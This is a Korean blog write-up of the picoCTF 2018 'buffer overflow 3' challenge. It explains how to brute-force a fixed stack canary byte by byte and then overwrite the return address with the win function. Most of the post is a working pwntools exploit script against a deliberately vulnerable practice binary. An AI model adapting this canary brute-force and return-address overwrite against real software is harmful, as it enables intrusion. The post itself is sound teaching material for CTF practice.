Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 |
Tags
- Reverse
- shellcraft
- ASM
- Bug
- Bottle
- string
- FSB
- Read
- anti
- Rookiss
- rev
- pwnable.kr
- Toddler's Bottle
- picoCTF
- practicalmalwareanalysis
- writeup
- pico
- toddler
- pwn
- format
- BOF
- 2018
- CTF
- TUCTF
- reversing
- pwnable
- PMA
- shellcode
- Leak
- CANARY
Archives
- Today
- Total
제리의 블로그
picoCTF 2018 buffer overflow 3 Binary Exploitation 본문
요약
4바이트 길이의 canary 값이 고정되어 있기 때문에
1바이트씩 '\x00' 부터 '\xff' 까지 넣어봐서 "stack smash" 가 뜨는지 확인하면
"4xV," 가 canary 임을 알 수 있고
이제 RET에 flag를 출력해주는 함수 elf.sym.win 로 덮어씌워주면 해결된다.
from pwn import *
import string
import sys
#context.log_level = 'error'
e = ELF('./vuln')
CANARY = '4xV,'
CANARY_LEN = len(CANARY)
print(CANARY_LEN)
len = 32 + CANARY_LEN + 0x10 + 4
#for c in range(0x100):
p = process('./vuln')
p.recvuntil('How Many Bytes will You Write Into the Buffer?')
p.sendline(str(len))
p.recvuntil('Input> ')
payload = ''
payload += 'A'*32
payload += CANARY# + chr(c)
payload += 'B'*0x10
payload += p32(e.sym.win)
#raw_input()
p.send(payload)
a00 = p.recv(1)
#if a00 == 'O':
# print(repr(chr(c)))
# #break
#elif a00 == '*':
# sys.stdout.write('.')
#else:
# sys.stdout.write('!')
p.interactive()
'CTF > pwnable' 카테고리의 다른 글
| picoCTF 2018 got-shell? Binary Exploitation (0) | 2018.10.09 |
|---|---|
| picoCTF 2018 can-you-gets-me Binary Exploitation (0) | 2018.10.03 |
| picoCTF 2018 shellcode Binary Exploitation (0) | 2018.09.30 |
| picoCTF 2018 buffer overflow 0 (0) | 2018.09.30 |
| DefCamp CTF 2018 even more lucky Exploit (0) | 2018.09.23 |
'CTF/pwnable' Related Articles
more
Comments